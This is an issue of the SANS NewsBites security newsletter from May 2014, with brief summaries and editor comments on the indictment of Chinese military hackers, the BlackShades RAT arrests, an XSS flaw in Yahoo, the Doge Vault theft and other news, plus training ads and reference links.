SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

• SANS NewsBites RSS
• Editorial Board

Volume XVI - Issue #40

May 20, 2014

TOP OF THE NEWS

DOJ Indicts Five Chinese Military Members for Alleged Commercial Espionage
China Suspends Cyber Security Cooperation with US
Cisco CEO Tells Obama That NSA Installed Backdoors are Not Good for the Economy
Worldwide Arrests Over BlackShades Malware

THE REST OF THE WEEK'S NEWS

Instant Messaging Services to Require Encryption for Connections
Yahoo Fixes Vulnerability in Comments Sections of Sites
LifeLock Pulls App, Deletes Customer Data Over PCI Compliance Concerns
Critical Flaws in Load Balancer, Modems
Doge Vault Loses US $130,000 to Attackers
Experts Will Review NIST Cryptographic Standard Revision Proposal
FBI Wants to Buy Malware
Chairman of Joint Chiefs of Staff Says Country Not Prepared for Cyber Attack

STORM CENTER TECH CORNER

STORM CENTER TECH CORNER

---

************************** Sponsored By Lancope *************************
Ponemon Institute Research Report - Cyber Security Incident Response: Are we as prepared as we think? Get your copy - http://www.sans.org/info/159802
***************************************************************************
TRAINING UPDATE


-- SANS Rocky Mountain 2014 Denver, CO June 9-14, 2014 8 courses. Bonus evening presentations include Continuous Ownage; Why You Need Continuous Monitoring; and APT: It is Time to Act.
http://www.sans.org/event/rocky-mountain-2014


--SANSFIRE 2014 Baltimore, MD June 21-30, 2014 42 courses. Bonus evening presentations include Avoiding Cyberterrosism Threats Inside Electrical Substations; Security Awareness Metrics: Measuring Human Behavior; and penetration Testing Corporate Mobile Applications and BYOD Environments.
http://www.sans.org/event/sansfire-2014


--SANS Capital City 2014 Washington, DC July 7-12, 2014 7 courses. Bonus evening presentations include Weaponizing Digital Currency; Incident Response and Forensics in the Cloud; and Who's Watching the Watchers?
http://www.sans.org/event/capital-city-2014


--SANS Secure Europe 2014 Amsterdam, Netherlands May 10-24, 2014 11 courses.
http://www.sans.org/event/secure-europe-2014


--SANS Pen Test Berlin Berlin, Germany June 15-21, 2014 6 courses. Bonus evening session: Pwn a Drone Hacking Challenge.
http://www.sans.org/event/pentest-berlin-2014


--SANS London Summer 2014 London, UK July 14-21, 2014 5 courses.
http://www.sans.org/event/london-summer-2014


--Can't travel? SANS offers LIVE online instruction. Day (www.sans.org/simulcast) and Evening courses (www.sans.org/vlive) available!


--Multi-week Live SANS training
http://www.sans.org/mentor/about
Contact mentor@sans.org


--Looking for training in your own community?
http://www.sans.org/community/


--Save on On-Demand training (30 full courses) - See samples at
http://www.sans.org/ondemand/specials

Plus Austin, Malaysia, and Bangkok all in the next 90 days.

For a list of all upcoming events, on-line and live: http://www.sans.org

*****************************************************************************

---

TOP OF THE NEWS

DOJ Indicts Five Chinese Military Members for Alleged Commercial Espionage (May 19, 2014)

The US Department of Justice (DOJ) has charged five members of China's People's Liberation Army with conspiracy to commit computer fraud and abuse. The men allegedly broke into the networks of several major US companies and stole data including cost and pricing information and technical plans. This is the first instance in which the US has brought legal action against foreign government workers regarding cyber crime. The move could spur other countries to make similar legal claims against the US.
-http://www.washingtonpost.com/world/national-security/us-to-announce-first-crimi
nal-charges-against-foreign-country-for-cyberspying/2014/05/19/586c9992-df45-11e
3-810f-764fe508b82d_story.html
-http://www.washingtonpost.com/blogs/the-switch/wp/2014/05/19/everything-you-need
-to-know-about-the-alleged-chinese-military-hacker-squad-the-u-s-just-indicted/
-http://www.bbc.com/news/world-us-canada-27475324
-http://www.nextgov.com/cybersecurity/2014/05/us-files-criminal-charges-against-c
hinese-military-officials-hacking-american-companies/84691/?oref=ng-relatedstori
es
-http://www.theregister.co.uk/2014/05/19/us_authorities_name_five_chinese_militar
y_hackers_wanted_for_espionage/
-http://www.wired.com/2014/05/us-indictments-of-chinese-military-hackers-could-be
-awkward-for-nsa/
[Editor's Note (Henry): This is a big step, IMHO. The USG has known about this for years, has attempted diplomatic discussions, yet the activities continue. It is largely symbolic...the PRC is not going to extradite its military officers...yet it says "this is no longer acceptable behavior." How many days in a row do you get your lunch money stolen before someone does something about it? Yes, defense in depth is important...it's CRITICAL. Regardless, the defense of networks must be multi-lateral, and changing the behavior of those conducting this activity is necessary to manage the threat. While not a silver bullet, this action by the US government adds a new dimension to the status quo.
(Pescatore): There is an old saying: "People who throw stones from within their glass house will get wet the next time it rains."
(Assante): Much of the world fails to draw a distinction between espionage for the purposes of foreign intelligence gathering and economic competitiveness. Chinese leaders will probably not interpret the intended consequences of this legal action as a negative reflection on their conduct in a global market place. This action is an effort to achieve the 'collective goal' of raising an attacker's cost - especially in time, resources, and risk - so the costs exceed their perceived benefit.]

China Suspends Cyber Security Cooperation with US

(May 19, 2014) China has suspended cooperative cyber security efforts with the US in the wake of the indictment of five Chinese military officials on espionage-related charges. Calling the charges "deliberately fabricated," Chinese officials have also said that the US may face retaliation. China and the US agreed to the Cyber Working Group initiative just last month. Chinese officials also say that the US "has been conducting cyber intrusion, wiretapping, and surveillance against Chinese government departments, institutions, companies, universities, and individuals."
-http://www.businessweek.com/news/2014-05-19/china-suspends-cybersecurity-coopera
tion-with-u-dot-s-dot-after-charges
-http://www.nbcnews.com/news/world/china-suspends-cybersecurity-cooperation-after
-us-charges-n109476
[Editor's Note (Pescatore): It is official: we can now call this era the "Cyber Cold War." ]

Cisco CEO Tells Obama That NSA-Installed Backdoors are Not Good for the Economy (May 19, 2014)

Cisco CEO John Chambers has written to President Obama, saying that reports of the NSA adding surveillance technology to networking devices could damage consumer confidence in US products, thus damaging the economy. Chambers asked President Obama to establish rules governing how NSA operates to ensure the agency does not threaten the integrity of US companies.
-http://arstechnica.com/information-technology/2014/05/cisco-ceo-to-obama-dont-le
t-nsa-intercept-and-hack-our-gear/
-http://www.bbc.com/news/technology-27468794
-http://www.computerworld.com/s/article/9248420/Cisco_CEO_tells_Obama_that_NSA_sp
ying_hits_tech_sales?taxonomyId=17
-http://www.cnet.com/news/cisco-ceo-asks-obama-to-control-nsa-surveillance/
-http://www.theregister.co.uk/2014/05/19/ciscos_chambers_to_obama_stop_fiddling_o
ur_routers/
[Editor's Note (Pescatore): This Cyber Cold War era is very complicated. The US is charging the Chinese with cyber attacks that damage our economy, while the CEO of a US vendor is making the same charges against the US. Meanwhile, Huawei has funded the Cyber Security Evaluation Centre in the UK where the UK tests Huawei gear to make sure there are no backdoors installed, and Chinese DDoS mitigation vendor NSFocus pays US application security test company Veracode to do the same for their products. It is hard to tell who the good guys are in this war, but the US is definitely not leading on the transparency front.
(Shpantzer): Obligatory damage control to distance the American corporation from the American intelligence agency. What can be done to prevent the French/Israeli/Chinese/etc. intelligence agencies from opening a box and sticking some extra goodies into a piece of hardware in their own country, or someone else's, for that matter? MAYBE some sort of tamper-evident seal, but what about Customs and other good excuses? ]

Worldwide Arrests Over BlackShades Malware (May 19, 2014)

Nearly 100 people have been arrested worldwide in connection with a sweep targeting buyers, sellers, and users of a remote access Trojan (RAT) known as BlackShades. BlackShades can also log keystrokes and be used to access documents, pictures, and other files on infected machines. It also allows attackers to control webcams. BlackShades has infected between 500,000 and 700,000 machines.
-http://arstechnica.com/security/2014/05/more-than-100-arrested-in-global-crackdo
wn-on-peeping-tom-malware/
-http://www.nbcnews.com/tech/security/creepware-hacker-sting-nets-97-worldwide-n1
09061
-http://www.computerworld.com/s/article/9248431/BlackShades_users_targeted_in_16_
nation_sweep_97_arrested?taxonomyId=17
-http://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/
[Editor's Note (Ullrich): The interesting part here is that after arresting the creators of the exploit kit, law enforcement used the data collected from the creator to go after customers who purchased the malware. The international collaboration in this case is impressive.
(Murray): Preferred the Krebs report. What is significant is that this "crackdown" was on the trade. It has created a great deal of angst in this illicit, but fairly public, market. However, this product competed on price and appealed to the least sophisticated buyers. One hopes that the "Zeus market" gains the same attention.
(Honan): Well done to all involved and in particular Europol's CyberCrime Centre (EC3) which coordinated this activity. ]

---

************************** Sponsored Links: ******************************
1) Do you know how to protect your organization? Download the free eBook: Endpoint Threat Detection for Dummies! http://www.sans.org/info/159807

2) Webcast: Securing Web Applications: Identifying and Managing Risks with Programming Languages and Frameworks with Johannes Ullrich and Jeremiah Grossman. Wednesday, May 21 at 1:00 PM EDT. http://www.sans.org/info/159812

3) Webcast: Best Practices for Leveraging Security Threat Intelligence. Wednesday, June 04 at 1:00 PM EDT - with Russell Spitler & Dave Shackleford. http://www.sans.org/info/159817
*****************************************************************************

---

THE REST OF THE WEEK'S NEWS

Instant Messaging Services to Require Encryption for Connections (May 20, 2014)

Instant messaging services will begin requiring encryption for client-to-server and server-to-server connections. Unencrypted connections will be refused. The new policy grew out of a 2012 pledge by developers to test encryption for the extensible messaging and presence protocol (XMPP) to protect the communications form eavesdroppers.
-http://www.theregister.co.uk/2014/05/20/im_upgrade_locks_out_lazy_eavesdroppers/
[Editor's Note (Pescatore): I'm not sure there this really makes any meaningful changes in anyone's real world risk equation. For most businesses that allow outbound IM from their desktops, the loss in visibility into IM traffic brings some increase in risk while there haven't been many documented instances of business impact due to IM eavesdropping. But, in general all communications over the Internet making transport encryption the default should be the norm. ]

Yahoo Fixes Vulnerability in Comments Sections of Sites (May 19, 2014)

A flaw that could have allowed cross-site scripting attacks in the comments sections of most Yahoo sites has been fixed. The vulnerability could have been exploited to steal information, including session tokens and cookies, simply by placing malicious code in the comments section.
-http://www.scmagazine.com/most-yahoo-sites-impacted-by-xss-flaw-in-comments-sect
ion/article/347606/

LifeLock Pulls App, Deletes Customer Data Over PCI Compliance Concerns (May 19, 2014)

LifeLock has shut down its Wallet App and deleted all related customer data held on its servers over concerns that the app did not comply with payment card industry data security standards (PCI DSS). LifeLock CEO Todd Davis said the decision was made proactively, not in response to a breach.
-http://www.theregister.co.uk/2014/05/19/lifelock_yanks_mobile_app/
-http://arstechnica.com/tech-policy/2014/05/id-theft-protector-lifelock-deletes-u
ser-data-over-concerns-that-app-isnt-safe/
-http://www.zdnet.com/lifelock-deletes-data-on-4m-users-in-face-of-potential-pci-
violations-7000029628/
[Editor's Note (Shpantzer): Plan for security, then check for security, then deploy financial app. In that order, preferably.]

Critical Flaws in Load Balancer, Modems (May 16, 2014)

Critical flaws in a load balancer and several modems could be exploited through the Simple Network Management Protocol (SNMP) public community string. The issue lies in the Management Information Base. The flaws affect a Brocade application load balancer and certain Ambit, Ubee, and Netopia cable modems.
-http://www.scmagazine.com/critical-info-on-modems-load-balancer-exposed-via-snmp
-community-string/article/347393/
[Editor's Note (Ullrich): It isn't great that these devices include critical information like passwords in their MIB. But the real problem here is that SNMP is exposed to the Internet and the community string wasn't changed. ]

Doge Vault Loses US $130,000 to Attackers (May 16 & 19, 2014)

Online wallet Doge Vault says attackers "gained access to the node on which Doge Vault's virtual machines were stored" and stole 70 percent of the assets held, roughly US $130,000. Doge Vault also said that the attackers probably accessed its user account database noting, that passwords were encrypted with a "a strong one-way hashing algorithm." The attackers targeted Doge Vault's "hot wallet," which allows users to access the crypto currency quickly.
-http://www.zdnet.com/doge-vault-hack-exposes-user-passwords-wallet-data-70000295
99/
-http://www.computerworld.com/s/article/9248393/Hackers_hit_DogeVault_virtual_mac
hines?taxonomyId=17
-http://www.theregister.co.uk/2014/05/16/dogecoin_off_the_leash_after_doge_vault_
admits_server_attack/

Experts Will Review NIST Cryptographic Standard Revision Proposal (May 14 & 16, 2014)

A panel of experts will conduct an independent assessment of the National Institute of Standards and Technology's (NIST's) cryptographic standards and guidelines development proposal. After it was revealed that the NSA interfered with the development of these things, NIST released a draft report (in February 2014) describing proposed changes to its development process. A seven-member Committee of Visitors will examine the report. The Federal Information Security Management Act (FISMA) requires that NIST work with the NSA on cyber security guidance; federal civilian agencies are required to adopt this guidance. Among the comments submitted since the draft's release in February was the suggestion that NIST needs to be more transparent about its relationship with the NSA. Another commenter noted that because the standards are used around the world, NIST should not "prioritize US interests or discount international perspectives."
-http://www.govinfosecurity.com/experts-to-assess-nist-cryptography-program-a-684
6
-http://www.nist.gov/director/vcat/vcat-051414.cfm
[Editor's Note (Pescatore): The open process that NIST led in 2001 that resulted in the Advanced Encryption Standard replacing DES was a watershed breakthrough in the right way to make the online world more secure. This Committee of Visitors has many very respected names on it (though it would have been nice to have been a bit more international) and I hope their recommendations are acted upon. ]

FBI Wants to Buy Malware (May 15, 2014)

According to a solicitation notice, the FBI is seeking a contractor to provide the agency with 30 to 40 gigabytes a day of malware - both new malware and variants of old malware. The FBI wants the malware to further its "mission to obtain global awareness of malware threat."
-http://www.scmagazine.com/fbi-begins-shopping-around-for-malware/article/347292/
-http://www.nextgov.com/cybersecurity/2014/05/why-fbi-wants-procure-malware/84505
/?oref=ng-channelriver

Chairman of Joint Chiefs of Staff Says Country Not Prepared for Cyber Attack (May 14, 2014)

Speaking at a conference last week, Chairman of the Joint Chiefs of Staff General Martin Dempsey said that the US does not have a coherent cyber strategy, and that the country is not prepared for a cyber attack. Dempsey says he understands that concerns about cost, privacy, and information sharing contribute to the lack of a strategy. He is concerned not only about distributed denial-of-service (DoS) attacks and data destruction, but also about data corruption, which "causes you to lose confidence in your systems." Arati Prabhakar, who directs the Defense Advanced Research Project Agency (DARPA), reiterated concern about data integrity, noting that "unless we have done something to avoid it, ... our embedded military systems ... can be compromised."
-http://fedscoop.com/joint-chiefs-chairman-voices-concerns-nations-cybersecurity-
posture/
[Editor's Note (Assante): "In search of trust" - that challenge should worry critical infrastructure operators. Losing confidence in your safe interactions with a web e-commerce page is one thing. Losing confidence in the systems holding back hazard chemicals or performing life preserving or threatening functions is another matter all together. One of the hardest questions I had to face, was from my former chairman, he asked at what level of confidence would we regain integrity of our operational systems after a compromise? He asked a very important question with far reaching implications.
(Shpantzer): Let's not discount data destruction attacks just yet. Saudi Arabia and South Korea destructive attacks. Wiping hard drives en masse is no joke, as the admins of the SCCM server at Emory University learned the hard way last week...
-http://webcache.googleusercontent.com/search?q=cache:EF2iQlmDhB8J:it.emory.edu/w
indows7-incident/+&cd=1&hl=en&ct=clnk&gl=us
(Murray): To Gal Shpantzer's point, one important step would be to restrict "write" access and isolate our "backups" from the systems and networks they protect. ]

---

STORM CENTER TECH CORNER

iTunes Update
-http://support.apple.com/kb/TS5434

Powershell Tricks
-https://isc.sans.edu/forums/diary/Punking+Pet+Peeves+with+PowerShell/18133

Fake Kaspersky Products
-http://usa.kaspersky.com/about-us/press-center/press-releases/attack-clones-fake
-kaspersky-lab-anti-virus-apps-invade-two-mob

D-Link Smart Plug Buffer Overflow
-http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/
-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10027

FBI Cyber Most Wanted
-http://www.fbi.gov/wanted/cyber

Bitcoin Blockchain False Positive With MSFT Security Essentials
-https://answers.microsoft.com/en-us/protect/forum/mse-protect_updating/microsoft
-security-essentials-reporting-false/0240ed8e-5a27-4843-a939-0279c8110e1c?tm=140
0189799602

iOS 7.1.1. jailbreak
-http://www.reddit.com/r/jailbreak/comments/25z0oj/the_people_who_have_the_711_ja
ilbreak_information/

---

***********************************************************************
The Editorial Board of SANS NewsBites

John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry recently retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response. He is now president of CrowdStrike Services.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course..

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is a Principal at The Chertoff Group and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Sean McBride is Director of Analysis and co-founder of Critical Intelligence, and, while at Idaho National Laboratory, he initiated the situational awareness effort that became the ICS-CERT.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is a Senior Security Consultant and Malware Analyst for InGuardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/